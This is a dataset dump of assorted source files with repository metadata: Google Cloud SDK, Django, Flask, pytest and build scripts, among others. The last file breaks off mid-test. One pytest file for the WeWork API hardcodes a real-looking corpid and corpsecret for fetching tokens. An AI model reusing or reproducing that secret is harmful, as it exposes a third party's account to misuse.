blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed515808184c081c4fe7c811731cae8cc21cb5fd
|
c97b9ae1bf06757ba61f90905e4d9b9dd6498700
|
/venv/Lib/site-packages/imantics/annotation.py
|
5535c91b19b0b5a735786a01eb14c20edbc7670d
|
[] |
no_license
|
Rahulk1p/image-processor
|
f7ceee2e3f66d10b2889b937cdfd66a118df8b5d
|
385f172f7444bdbf361901108552a54979318a2d
|
refs/heads/main
| 2023-03-27T10:09:46.080935
| 2021-03-16T13:04:02
| 2021-03-16T13:04:02
| 348,115,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:4337ed1406db4375634044a08344b5e77cd0331e135f6356cd1b5ece79d71b35
size 27249
|
[
"rksc.k1p@gmail.com"
] |
rksc.k1p@gmail.com
|
2c1962938cf8bb8b5efd4e2c67d5f4f15c221da2
|
d842a95213e48e30139b9a8227fb7e757f834784
|
/gcloud/google-cloud-sdk/lib/surface/dataproc/jobs/update.py
|
749d26147d72d4fcd856c79801bef8d5f2eb664d
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] |
permissive
|
bopopescu/JobSniperRails
|
f37a15edb89f54916cc272884b36dcd83cdc868a
|
39e7f871887176770de0f4fc6789e9ddc7f32b1f
|
refs/heads/master
| 2022-11-22T18:12:37.972441
| 2019-09-20T22:43:14
| 2019-09-20T22:43:14
| 282,293,504
| 0
| 0
|
MIT
| 2020-07-24T18:47:35
| 2020-07-24T18:47:34
| null |
UTF-8
|
Python
| false
| false
| 2,865
|
py
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update job command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.dataproc import dataproc as dp
from googlecloudsdk.api_lib.dataproc import util
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import log
class Update(base.UpdateCommand):
"""Update the labels for a job.
Update the labels for a job.
## EXAMPLES
To add the label 'customer=acme' to a job , run:
$ {command} job_id --update-labels=customer=acme
To update the label 'customer=ackme' to 'customer=acme', run:
$ {command} job_id --update-labels=customer=acme
To remove the label whose key is 'customer', run:
$ {command} job_id --remove-labels=customer
"""
@staticmethod
def Args(parser):
flags.AddJobFlag(parser, 'update')
changes = parser.add_argument_group(required=True)
# Allow the user to specify new labels as well as update/remove existing
labels_util.AddUpdateLabelsFlags(changes)
def Run(self, args):
dataproc = dp.Dataproc(self.ReleaseTrack())
job_ref = util.ParseJob(args.job, dataproc)
changed_fields = []
orig_job = dataproc.client.projects_regions_jobs.Get(
dataproc.messages.DataprocProjectsRegionsJobsGetRequest(
projectId=job_ref.projectId,
region=job_ref.region,
jobId=job_ref.jobId))
# Update labels if the user requested it
labels_update_result = labels_util.Diff.FromUpdateArgs(args).Apply(
dataproc.messages.Job.LabelsValue, orig_job.labels)
if labels_update_result.needs_update:
changed_fields.append('labels')
updated_job = orig_job
updated_job.labels = labels_update_result.GetOrNone()
request = dataproc.messages.DataprocProjectsRegionsJobsPatchRequest(
projectId=job_ref.projectId,
region=job_ref.region,
jobId=job_ref.jobId,
job=updated_job,
updateMask=','.join(changed_fields))
returned_job = dataproc.client.projects_regions_jobs.Patch(request)
log.UpdatedResource(returned_job)
return returned_job
|
[
"luizfper@gmail.com"
] |
luizfper@gmail.com
|
f4ea20b4c2b18eb379561c51c45e1ffce98af783
|
2a4432ce7d738b3670e07841d211689e3b4b19c0
|
/code/01-basics/lists-03.py
|
08a8627f70507e10491153f1609d272bc74a84cb
|
[] |
no_license
|
avdata99/programacion-para-no-programadores
|
3f9ebba212fb1401bf5bba3befc394f4017d1de6
|
cb2405a6789535aa0c276b43116adb22b2c24a54
|
refs/heads/master
| 2022-12-14T10:18:23.523639
| 2022-11-29T00:55:14
| 2022-11-29T00:55:14
| 144,493,639
| 6
| 2
| null | 2022-11-17T23:53:47
| 2018-08-12T19:07:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
apellidos = ["gonzalez", "gomez", "rodriguez", "lopez", "garcia"]
total_apellidos = len(apellidos)
print(f'Total de apellidos: {total_apellidos}')
# Total de apellidos: 5
primer_apellido = apellidos[0]
print(f'El primer apellido es: {primer_apellido}')
# El primer apellido es: gonzalez
ultimo_apellido = apellidos[-1]
print(f'El último apellido es: {ultimo_apellido}')
# El último apellido es: garcia
primeros_2 = apellidos[0:2]
print(f'Los primeros dos: {primeros_2}')
# Los primeros dos: ['gonzalez', 'gomez']
ultimos_2 = apellidos[-2:]
print(f'Los últimos dos son: {ultimos_2}')
# Los últimos dos son: ['lopez', 'garcia']
# eliminar elementos especìficos
apellidos.remove("lopez")
# eliminar el primer elemento
del apellidos[0]
# eliminar y devolver lo eliminado
primer_elemento = apellidos.pop(0)
print(f'El primero era: {primer_elemento} y ahora es {apellidos[0]}')
# El primero era: gomez y ahora es rodriguez
# ordenar
apellidos.sort()
print(f'Lista ordenada: {apellidos}')
# Lista ordenada: ['garcia', 'rodriguez']
# invertir orden
apellidos.reverse()
print(f'Lista invertida: {apellidos}')
# Lista invertida: ['rodriguez', 'garcia']
|
[
"andres@data99.com.ar"
] |
andres@data99.com.ar
|
7b3cdaf3ccf1f5c613858afc5c0fa5a59173d639
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/playground/mehmet/trinity/base/kdenetwork/actions.py
|
19635dd1b8448712d3dda9394fabfd51056431d3
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356
| 2013-07-23T17:57:58
| 2013-07-23T17:57:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2010 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import kde
from pisi.actionsapi import get
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
KeepSpecial=["libtool"]
shelltools.export("HOME", get.workDIR())
WorkDir = "%s" % get.srcNAME()
def setup():
# Fix automake and python detection
pisitools.dosed("admin/cvs.sh", "automake\*1\.10\*", "automake*1.1[0-5]*")
pisitools.dosed("admin/acinclude.m4.in", "KDE_CHECK_PYTHON_INTERN\(\"2.5", "KDE_CHECK_PYTHON_INTERN(\"%s" % get.curPYTHON().split("python")[1])
kde.make("-f admin/Makefile.common")
shelltools.export("DO_NOT_COMPILE", "ksirc wifi lanbrowsing")
kde.configure("--with-slp \
--with-wifi \
--disable-sametime-plugin \
--without-xmms \
--without-external-libgadu")
def build():
kde.make()
def install():
kde.install()
pisitools.dodir("/etc")
shelltools.touch("%s/etc/lisarc" % get.installDIR())
# We replace this file
pisitools.remove("/usr/kde/3.5/share/apps/konqueror/servicemenus/kget_download.desktop")
#pisitools.insinto("/etc/ppp/peers", "kppp_peers", "kppp")
# DO_NOT_COMPILE doesn't cover docs
pisitools.removeDir ("/usr/kde/3.5/share/doc/HTML/en/ksirc/")
pisitools.removeDir ("/usr/kde/3.5/share/doc/HTML/en/kwifimanager/")
|
[
"yusuf.aydemir@istanbul.com"
] |
yusuf.aydemir@istanbul.com
|
3e98aa2b893184dcc8212f0ed3f0280ba18d4a70
|
5f845ebbc2c9b40eea702833c91928ae90ae7ee5
|
/algorithms/sansa-and-xor.py
|
c530755cda1afdf3da0b31b5a9bbdc62129a51ba
|
[
"MIT"
] |
permissive
|
imgeekabhi/HackerRank
|
7a1917fee5af01976aebb9c82aa1045a36487016
|
7fe4a308abad85ce446a28328324be480672e6fc
|
refs/heads/master
| 2022-12-28T19:13:49.098090
| 2020-10-11T09:29:08
| 2020-10-11T09:29:08
| 300,023,395
| 1
| 0
|
MIT
| 2020-09-30T18:48:12
| 2020-09-30T18:48:11
| null |
UTF-8
|
Python
| false
| false
| 443
|
py
|
#!/bin/python3
import sys
def sansaXor(arr):
res = 0
arr_len = len(arr)
if arr_len % 2 == 0:
return 0
for ind in range(0, arr_len, 2):
res ^= arr[ind]
return res
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
n = int(input().strip())
arr = list(map(int, input().strip().split(' ')))
result = sansaXor(arr)
print(result)
|
[
"sergey.n.nemov@gmail.com"
] |
sergey.n.nemov@gmail.com
|
53398a65baec73f067d92879974a00c707a3553c
|
e681066a46e0b6ee27b23c9ea8ff471225e053e7
|
/email_auth/account/migrations/0002_auto_20200513_2234.py
|
37c420d45b631497c8626f62bb7b871d8785660f
|
[] |
no_license
|
arajo-hub/Test_Email-auth
|
b629108b99bcef69c072269c488cfe3217ff2c01
|
600a4923079ecff34d12c76a266ab0e21cb61cbf
|
refs/heads/master
| 2022-06-29T10:41:27.451862
| 2020-05-14T12:58:07
| 2020-05-14T12:58:07
| 263,462,773
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 875
|
py
|
# Generated by Django 3.0.6 on 2020-05-13 13:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='date_joined',
),
migrations.RemoveField(
model_name='user',
name='is_admin',
),
migrations.AlterField(
model_name='user',
name='is_active',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='user',
name='is_superuser',
field=models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status'),
),
]
|
[
"joara9566@naver.com"
] |
joara9566@naver.com
|
f52e7164e94f5951904433989503d2f1555eb7e7
|
4393a24ad5fbf31a59c3521ce4c66ff7d9a378bc
|
/wework/test_wework.py
|
bd605fe86d74a79775c427c23c18c0b2c3ccc461
|
[] |
no_license
|
Frecy16/learning
|
deba0abe0c326c6624456d83d3b75f06065c3834
|
a2b92f1c1dbd24bb5cc15ec9639c51aa8ca24902
|
refs/heads/master
| 2022-01-27T00:04:43.433775
| 2022-01-19T01:34:14
| 2022-01-19T01:34:14
| 210,374,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,809
|
py
|
# import json
# import random
import re
import pytest
import requests
def test_create_data():
"""
1、列表生成器
2、生成器
3、迭代器
"""
data = [("weixiao" + str(x),
"魏潇" + str(x),
"152%08d" % x) for x in range(20)]
print(data)
return data
class Testwework:
@pytest.fixture(scope="session")
def token(self):
requests_params = {
"corpid": "ww1d0df80a9ad528de",
"corpsecret": "8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk"
}
r = requests.get("https://qyapi.weixin.qq.com/cgi-bin/gettoken", params=requests_params)
return r.json()["access_token"]
def get_token(self):
"""
获取 token
企业id:ww1d0df80a9ad528de
通信录api secret:8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk
url : https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
"""
payload = {
"corpid": "ww1d0df80a9ad528de",
"corpsecret": "8nQMZi5-VPcw1UjYPcOLQWA0g-VdLHNV5531pbIPrkk"
}
r = requests.get("https://qyapi.weixin.qq.com/cgi-bin/gettoken", params=payload)
# print(r.json())
return r.json()["access_token"]
def test_create(self, token, userid, mobile, name="释琪", department=None):
"""
创建成员
url: https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
"""
# access_token = self.get_token()
if department is None:
department = [4]
body = {
"userid": userid,
"name": name,
"mobile": mobile,
"department": department,
}
# req_body = json.dumps(body) #字典转json json.loads() json转字典
r = requests.post(f"https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token={token}",
json=body)
print(r.json())
return r.json()
def test_get_users(self, token):
# access_token = self.get_token()
r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token={token}\
&department_id=1&fetch_child=1")
# print(r.json())
print(r.json()["userlist"])
def test_getmermber(self, token, userid):
"""
获取成员信息
https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
"""
# access_token = self.get_token()
# userid = self.test_get_user(token)
# payload = {"userid":"wangzhen"}
r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token={token}&userid={userid}")
return r.json()
def test_update(self, token, userid, name="安琪", department=None, **kwargs):
"""
更新成员信息
https://qyapi.weixin.qq.com/cgi-bin/user/update?access_token=ACCESS_TOKEN
"""
# access_token = self.get_token()
if department is None:
department = [3]
body = {
"userid": userid,
"name": name,
"department": department,
"order": [1],
**kwargs
}
r = requests.post(f"https://qyapi.weixin.qq.com/cgi-bin/user/update?access_token={token}", json=body)
return r.json()
def test_delete(self, token, userid):
"""
删除成员
https://qyapi.weixin.qq.com/cgi-bin/user/delete?access_token=ACCESS_TOKEN&userid=USERID
"""
# access_token = self.get_token()
# self.test_create(token)
r = requests.get(f"https://qyapi.weixin.qq.com/cgi-bin/user/delete?access_token={token}&userid={userid}")
return r.json()
@pytest.mark.parametrize("userid,name,mobile", test_create_data())
def test_wework_crud(self, token, userid, mobile, name):
"""
整体测试
"""
# userid = "kenan123"
# name = "释琪"
# mobile = "15800000009"
try:
assert "created" == self.test_create(token, userid, mobile, name)["errmsg"]
except AssertionError as e:
if "mobile existed" in e.__str__():
re_userid = re.findall(":(.*)'$", e.__str__())[0]
self.test_delete(token, re_userid)
assert "created" == self.test_create(token, userid, mobile, name)["errmsg"]
assert name == self.test_getmermber(token, userid)["name"]
assert "updated" == self.test_update(token, userid, name="安琪")["errmsg"]
assert "安琪" == self.test_getmermber(token, userid)["name"]
assert "deleted" == self.test_delete(token, userid)["errmsg"]
assert 60111 == self.test_getmermber(token, userid)["errcode"]
# self.test_get_users(token)
|
[
"1376210796@qq.com"
] |
1376210796@qq.com
|
450c570d599fad38b19bafb4021da6c048f0d793
|
306d4c4ac51dbe13ae9fee8b3577ffc1ede53094
|
/ocelot/transformations/consequential/technology_levels.py
|
19451a83b04aea3c66e1fe1321f91acf228aa347
|
[] |
no_license
|
damanncarlos/Ocelot
|
80563c4ab4508a945a4a29b53cc3d0ba9906897d
|
20e9639570c43f84ae255750a6c402ebabe00981
|
refs/heads/master
| 2022-01-08T15:25:15.997661
| 2019-03-18T16:31:43
| 2019-03-18T16:31:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,009
|
py
|
# -*- coding: utf-8 -*-
from ... import toolz
from ...collection import Collection
import logging
def log_conflicting_technology_levels(data):
"""Log anytime that there are both ``undefined`` and ``current`` inputs to a market.
The behaviour when this condition occurs is undefined. We will later change all technology levels with ``undefined`` to ``current``, but there is no general rule what to prefer if there are already ``current`` activities in the market mix."""
activity_ds_filter = lambda x: x['type'] == 'transforming activity'
has_undefined = lambda x: any(ds for ds in x if ds['technology level'] == 'undefined')
has_current = lambda x: any(ds for ds in x if ds['technology level'] == 'current')
for rp, datasets in toolz.groupby('reference product',
filter(activity_ds_filter, data)).items():
if has_undefined(datasets) and has_current(datasets):
logging.info({
'type': 'table element',
'data': (rp, len(datasets))
})
return data
log_conflicting_technology_levels.__table__ = {
'title': 'Log when both ``undefined`` and ``current`` are present in a market mix',
'columns': ["Reference product", "Number of datasets"]
}
def switch_undefined_to_current(data):
activity_ds_filter = lambda x: x['type'] == 'transforming activity'
for ds in filter(activity_ds_filter, data):
if ds['technology level'] == 'undefined':
ds['technology level'] = 'current'
logging.info({
'type': 'table element',
'data': (ds['name'], ds['reference product'], ds['location'])
})
return data
switch_undefined_to_current.__table__ = {
'title': 'Switch all `undefined` activity technology levels to `current`',
'columns': ["Reference product", "Number of datasets"]
}
cleanup_technology_levels = Collection(
log_conflicting_technology_levels,
switch_undefined_to_current,
)
|
[
"cmutel@gmail.com"
] |
cmutel@gmail.com
|
a82e1eb0f34a3bd2d043461fa04d85c621dd4cd5
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/core/framework/log_memory_pb2.py
|
877be5882f2c766befdd8db5688b8069c4336556
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:855f12f0d0944d6b927291e87424c9455e25c435568ede0a38451bc1a808da1a
size 16503
|
[
"github@cuba12345"
] |
github@cuba12345
|
3a501e957c950c05c748d009493cf36c34f4b4c1
|
48e442524807b249ec001b712716c23094d8e2ed
|
/_side_projects/client-server-request_size_experiments/ServerBlobTest.py
|
6ee7106de4955d09cc763d1125f7c5d990d410b4
|
[] |
no_license
|
BillMK/AttentionPipeline
|
a3ad4befe1b62e6d8b24b53c8db3123a8fd97bda
|
70e37142e79996e62c51c85de996127e38606efa
|
refs/heads/master
| 2022-02-26T12:13:42.754907
| 2019-10-23T22:21:26
| 2019-10-23T22:21:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,579
|
py
|
import evaluation_code.darkflow_handler as darkflow_handler
from keras.preprocessing.image import img_to_array
from evaluation_code.encoding import base64_decode_image
from threading import Thread
import time
from PIL import Image
import flask
import io
import os
from timeit import default_timer as timer
from multiprocessing.pool import ThreadPool
# Thanks to the tutorial at: https://blog.keras.io/building-a-simple-keras-deep-learning-rest-api.html
app = flask.Flask(__name__)
darkflow_model = None
pool = ThreadPool()
# del
from timeit import default_timer as timer
import numpy as np
import base64
import sys
times_del = []
def base64_decode_image(a, dtype, shape):
# if this is Python 3, we need the extra step of encoding the
# serialized NumPy string as a byte object
if sys.version_info.major == 3:
a = bytes(a, encoding="utf-8")
# convert the string to a NumPy array using the supplied data
# type and target shape
a = np.frombuffer(base64.decodestring(a), dtype=dtype)
a = a.reshape(shape)
# return the decoded image
return a
class Server(object):
"""
Server
"""
def __init__(self):
print("Server ... starting server and loading model ... please wait until its started ...")
frequency_sec = 25.0
t = Thread(target=self.mem_monitor_deamon, args=([frequency_sec]))
t.daemon = True
t.start()
app.run()
# On server:
#app.run(host='0.0.0.0', port=8123)
def mem_monitor_deamon(self, frequency_sec):
import subprocess
while (True):
out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],
stdout=subprocess.PIPE).communicate()[0].split(b'\n')
vsz_index = out[0].split().index(b'RSS')
mem = float(out[1].split()[vsz_index]) / 1024
print("Memory:", mem)
time.sleep(frequency_sec) # check every frequency_sec sec
@app.route("/handshake", methods=["POST"])
def handshake():
# Handshake
data = {"success": False}
start = timer()
if flask.request.method == "POST":
if flask.request.files.get("client"):
client_message = flask.request.files["client"].read()
print("Handshake, received: ",client_message)
end = timer()
data["internal_time"] = end - start
data["success"] = True
# return the data dictionary as a JSON response
return flask.jsonify(data)
@app.route("/test_request_size", methods=["POST"])
def test_request_size():
# Evaluate data
data = {"success": False}
if flask.request.method == "POST":
lens = []
blobs = []
t1 = timer()
for key in flask.request.files:
blob = flask.request.files[key].read()
l = len(blob)
print("blobl length/size",l)
lens.append(l)
blobs.append(blob)
t2 = timer()
times_del.append((t2-t1))
print("reading time avg ", np.mean(times_del))
print("trying to load it...")
blob = blobs[0]
print("blob : ", type(blob), blob)
image = Image.open(io.BytesIO(blob))
print("image : ", type(image), image)
image = img_to_array(image)
print("image : ", type(image), image.shape)
data["time"] = (t2-t1)
data["blob_lengths"] = lens
# indicate that the request was a success
data["success"] = True
return flask.jsonify(data)
if __name__ == "__main__":
server = Server()
|
[
"previtus@gmail.com"
] |
previtus@gmail.com
|
49ecb24adbd6f2b9430e2a9828ec499e8267a836
|
b627da650f75bdcf7e0dc0ef5c4419cf53a1d690
|
/src/zqh_rocc/zqh_rocc_stub.py
|
b95f9096e435d5ea53232f3bfed6a993edd861ec
|
[] |
no_license
|
Jusan-zyh/zqh_riscv
|
4aa8a4c51e19fb786ba0c2a120722f1382994a52
|
bccde2f81b42ac258b92c21bb450ec6ff848387a
|
refs/heads/main
| 2023-08-06T12:56:52.420302
| 2021-09-21T01:25:41
| 2021-09-21T01:25:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
import sys
import os
from phgl_imp import *
from .zqh_rocc_main import zqh_rocc_base_module
class zqh_rocc_stub(zqh_rocc_base_module):
def main(self):
super(zqh_rocc_stub, self).main()
self.io.cmd.ready /= 0
self.io.resp.valid /= 0
self.io.resp.bits /= 0
self.io.mem.req.valid /= 0
self.io.mem.req.bits /= 0
self.io.mem.s1_kill /= 0
self.io.busy /= 0
self.io.interrupt /= 0
|
[
"zhouqinghua888@163.com"
] |
zhouqinghua888@163.com
|
412d627460ca3bf78dd7d852aef36fe557ff61f5
|
1eb488aea8ca5c9dca18f110b63e4936f91f9bb6
|
/detecting_double_compression_using_lame_and_mpg123/training_models.py
|
18a19caedf3433f5feb0fb0f14df7ddf81831c91
|
[] |
no_license
|
brickgao/Audio_Detecting_Misc
|
fbd5f51a54311ceecbea8ec6069ffc6580d7830c
|
65d93597d0565042653fbb8c5d5c485524717867
|
refs/heads/master
| 2021-01-23T06:44:52.706198
| 2014-04-15T15:23:23
| 2014-04-15T15:23:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,362
|
py
|
# -*- coding: utf-8 -*-
import os
from libsvm.svmutil import *
_bitrate_list = [u'8', u'16', u'24', u'32', u'40', u'48',
u'56', u'64', u'80', u'96', u'112', u'128',
u'160', u'192', u'224', u'256', u'320']
_bitrate_list = [u'32']
_y, _x = [], []
def analyse_process(_group):
os.remove(u'tmp.wav')
os.remove(u'tmp.mp3')
_file_in = open(u'data.tmp', 'r')
_cnt_arr, _eq_zero, _len = [0.0 for x in range(20)], 0, 0
try:
for _i in range(2): _line = _file_in.readline()
while True:
_line = _file_in.readline()
if _line == '': break
if _line == '\n': continue
_mdct_arr = map(float, _line.split(' ')[:-1])
_len += 1
for _e in _mdct_arr:
if _e == 0.0: _eq_zero += 1
for _i in range(20):
_list = _mdct_arr[_i * 24: (_i + 1) * 24]
_cnt_arr[_i] += sum(_list) / 24.0
_eq_zero = float(_eq_zero) / float(_len)
for i in range(20): _cnt_arr[i] /= float(_len)
_y.append(_group)
_x.append([_eq_zero] + _cnt_arr)
finally:
_file_in.close()
os.remove(u'data.tmp')
# Decoder path
_decoder = os.path.abspath(u'./mpg123_decode/mpg123_to_wav.exe')
# Encoder path
_encoder = os.path.abspath(u'./lame_encode/lame.exe')
# Analyse origin mp3 file
for _bitrate in _bitrate_list:
_folder_path = os.path.abspath(u'F:/mp3_sample/origin/' + _bitrate)
_file_list = os.listdir(_folder_path)
print 'Starting analyse origin ' + str(_bitrate) + '-bitrate mp3 file'
for _file in _file_list:
_file_path = os.path.abspath(unicode(_folder_path) + u'/' + _file)
_recv = os.popen(_decoder + u' \"' + _file_path + u'\" tmp.wav').read()
if 'written' not in _recv:
print 'Warning: This file (' + str(_file_path) + ') is not support'
else:
_recv = os.popen(_encoder + u' tmp.wav tmp.mp3 -b 32').read()
analyse_process(1)
print 'Analysing for origin ' + str(_bitrate) + '-bitrate mp3 file has been done'
# Analyse double double-compress mp3 file
for _bitrate in _bitrate_list:
_folder_path = os.path.abspath(u'F:/mp3_sample/double_compression/' + _bitrate)
_nxt_folder_list = os.listdir(_folder_path)
print 'Starting analyse double-compress ' + str(_bitrate) + '-bitrate mp3 file'
for _nxt_folder in _nxt_folder_list:
_nxt_folder_path = os.path.abspath(unicode(_folder_path) + u'/' + _nxt_folder)
_file_list = os.listdir(_nxt_folder_path)
for _file in _file_list:
if u'_' + _bitrate + u'.mp3' == _file: continue
if _file != u'_64.mp3': continue
_file_path = os.path.abspath(unicode(_nxt_folder_path) + u'/' + _file)
_recv = os.popen(_decoder + u' \"' + _file_path + u'\" tmp.wav').read()
if 'written' not in _recv:
print 'Warning: This file (' + str(_file_path) + ') is not support'
else:
_recv = os.popen(_encoder + u' tmp.wav tmp.mp3 -b 64').read()
analyse_process(-1)
print 'Analysing for double-compress ' + str(_bitrate) + '-bitrate mp3 file has been done'
_m = svm_train(_y, _x)
svm_save_model('detecting_double_compression.model', _m)
|
[
"brickgao@gmail.com"
] |
brickgao@gmail.com
|
9b5d20d47711ba7a83d06dde399a527b07dff842
|
afa9fcd0f2443515ba89e96ed4eb9416e9d11847
|
/python/GafferUITest/WidgetSignalTest.py
|
16c810b148248bdab25d26e477a037f8edb2b1cb
|
[
"BSD-3-Clause"
] |
permissive
|
dneg/gaffer
|
6eb12b3ab3cde00afdf170c456969a38f5968237
|
e87cb50f55a048cd7f6d5dcdfe6f95e38db2c5b6
|
refs/heads/master
| 2021-01-16T18:13:33.456876
| 2013-09-24T17:23:58
| 2013-09-24T17:23:58
| 13,094,917
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,688
|
py
|
##########################################################################
#
# Copyright (c) 2011, John Haddon. All rights reserved.
# Copyright (c) 2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import weakref
import IECore
import Gaffer
import GafferUI
import GafferUITest
class WidgetSignalTest( GafferUITest.TestCase ) :
def test( self ) :
w = GafferUI.TabbedContainer()
s = GafferUI.WidgetSignal()
self.assertEqual( s( w ), False )
self.__widget = None
def f( ww ) :
self.__widget = ww
return True
c = s.connect( f )
self.assertEqual( s( w ), True )
self.assert_( self.__widget is w )
def testDeletionOfConnectionDisconnects( self ) :
w = GafferUI.TabbedContainer()
s = GafferUI.WidgetSignal()
self.assertEqual( s( w ), False )
def f( ww ) :
return True
c = s.connect( f )
self.assertEqual( s( w ), True )
del c
self.assertEqual( s( w ), False )
def testCircularRef( self ) :
class A( GafferUI.TabbedContainer ) :
def __init__( self ) :
GafferUI.TabbedContainer.__init__( self )
self.signal = GafferUI.WidgetSignal()
@staticmethod
def f( widget ) :
return True
def ff( self, other ) :
return True
a = A()
self.assertEqual( a.signal( a ), False )
a.c = a.signal.connect( A.f )
self.assertEqual( a.signal( a ), True )
w = weakref.ref( a )
self.assert_( w() is a )
del a
self.assertEqual( w(), None )
a2 = A()
self.assertEqual( a2.signal( a2 ), False )
# it is imperative to connect to a WeakMethod to prevent
# unbreakable circular references from forming.
